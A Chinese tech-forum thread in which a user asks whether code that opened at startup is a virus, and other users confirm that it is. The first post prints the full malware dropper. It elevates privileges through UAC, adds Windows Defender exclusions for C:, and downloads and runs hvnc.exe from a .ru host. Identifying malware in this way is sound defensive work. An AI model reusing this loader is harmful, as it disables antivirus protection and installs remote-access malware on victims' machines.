开机的时候自动用 vscode 打开了一段代码。ChatGPT 说是病毒??

查看 86|回复 6
作者:Jimmyisme   
代码传网盘了,有没有大佬能看看怎么办😭
https://www.alipan.com/s/ysPCcqoe5TT
第一个文件名是 hvnc.py
import os
import subprocess
script = """
import os
def create_and_run_bat_script():
    bat_script_content = '''
@echo off
set "filePath=%appdata%\Microsoft\emptyfile20947.txt"
:: BatchGotAdmin
:-------------------------------------
REM  --> Check for permissions
    IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (
>nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system"
) ELSE (
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
)
REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
    echo Requesting administrative privileges...
    goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    set params= %*
    echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs"
    "%temp%\getadmin.vbs"
    del "%temp%\getadmin.vbs"
    exit /B
:gotAdmin
    pushd "%CD%"
    CD /D "%~dp0"
:--------------------------------------   
mkdir "C:\Windows\WinEmptyfold"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"
set "temp_file=%TEMP%\hahabonk.exe"
powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://bananasquad.ru/hvnc.exe', '%temp_file%')"
start "" "%temp_file%"
del /q "%appdata%\Microsoft\runpython.py"
'''
    temp_folder = os.environ.get('TEMP', '')
    if temp_folder:
        bat_script_path = os.path.join(temp_folder, 'temp_script.bat')
        with open(bat_script_path, 'w') as bat_file:
            bat_file.write(bat_script_content)
        os.system(bat_script_path)
    else:
        print("Failed to get the TEMP folder path.")
if os.name == 'nt':
    folder_path = r"C:\Windows\WinEmptyfold"
    if os.path.exists(folder_path):
        exit()
    else:
        os.system('timeout 600')
        os.system('taskkill /f /im explorer.exe')
        create_and_run_bat_script()
        while True:
            os.system('timeout 5')
            if os.path.exists(folder_path):
                os.system('start explorer.exe')
                break
            else:
                create_and_run_bat_script()
"""
appdata = os.environ.get('APPDATA', '')
if appdata:
    # create microsoft folder if it doesn't exist
    microsoft_folder = os.path.join(appdata, 'Microsoft')
    if not os.path.exists(microsoft_folder):
        os.mkdir(microsoft_folder)
    script_path = os.path.join(appdata, 'Microsoft', 'runpython.py')
    with open(script_path, 'w') as script_file:
        script_file.write(script)
subprocess.Popen(['python', script_path], creationflags=subprocess.CREATE_NO_WINDOW)

exe, appdata, PowerShell, temp

Jimmyisme
OP
  
目前发现是在自启动中,但是我设置了 py 文件用 vscode 。可能就没有运行。
![](

)
Jimmyisme
OP
  
删除文件再 ctrl+z 撤回删除操作就被火绒拦截了。不是很懂为什么之前没有被发现。目前来看应该没什么大碍
![](

)
WoneFrank   
一看就病毒啊,有突破 UAC ,还去这拉了个 exe: https://bananasquad.ru/hvnc.exe 。
可以看 virustotal: https://www.virustotal.com/gui/domain/bananasquad.ru/relations
AoEiuV020JP   
有点搞笑了,投 python 病毒也不管电脑上有没有 python 环境,直接默认编辑器打开了,
Jimmyisme
OP
  
另一一个代码文件是(fernet)[https://github.com/oz123/python-fernet]加密的,
https://imgur.com/AAYVOQn
解密后是这样的
https://imgur.com/Z0h00ad
Kaggle notebook: https://www.kaggle.com/code/jimmyisme1/virus-check/notebook?scriptVersionId=164624730
Jimmyisme
OP
  
@WoneFrank 感谢,这方面的内容没有了解过,我看看有没有这个病毒的分析
您需要登录后才可以回帖 登录 | 立即注册

返回顶部